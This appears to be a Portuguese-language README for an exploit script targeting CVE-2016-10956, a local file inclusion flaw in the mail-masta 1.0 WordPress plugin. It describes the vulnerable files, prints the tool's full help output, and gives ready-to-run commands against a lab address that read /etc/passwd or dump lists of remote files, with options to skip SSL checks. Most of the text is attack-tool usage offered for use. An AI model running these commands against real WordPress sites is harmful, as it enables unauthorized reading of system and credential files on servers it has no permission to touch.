
Plugin MailMasta para WordPress com vulnerabilidade de Inclusão Local de Arquivo (CVE-2016-10956)
O plugin mail-masta 1.0 para WordPress tem leitura de arquivo local em count_of_send.php e csvexport.php.

$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Leitura de Arquivo Local (CVE-2016-10956)
usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]
Mensagem de descrição
optional arguments:
-h, --help mostra esta mensagem de ajuda e sai
-v, --verbose Modo verbose
-s, --only-success Apenas exibir tentativas de leitura bem-sucedidas.
-t TARGET_URL, --target TARGET_URL
URL do WordPress para conectar.
-f FILE, --file FILE Arquivo remoto para ler.
-F FILELIST, --filelist FILELIST
Arquivo contendo uma lista de caminhos de arquivos para ler remotamente.
-D DUMP_DIR, --dump-dir DUMP_DIR
Diretório onde os arquivos despejados serão armazenados.
-k, --insecure Permitir conexões inseguras ao usar SSL (padrão: False)
-r, --raw Despejo bruto do arquivo sem wrapper base64 do PHP (padrão: False)
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success
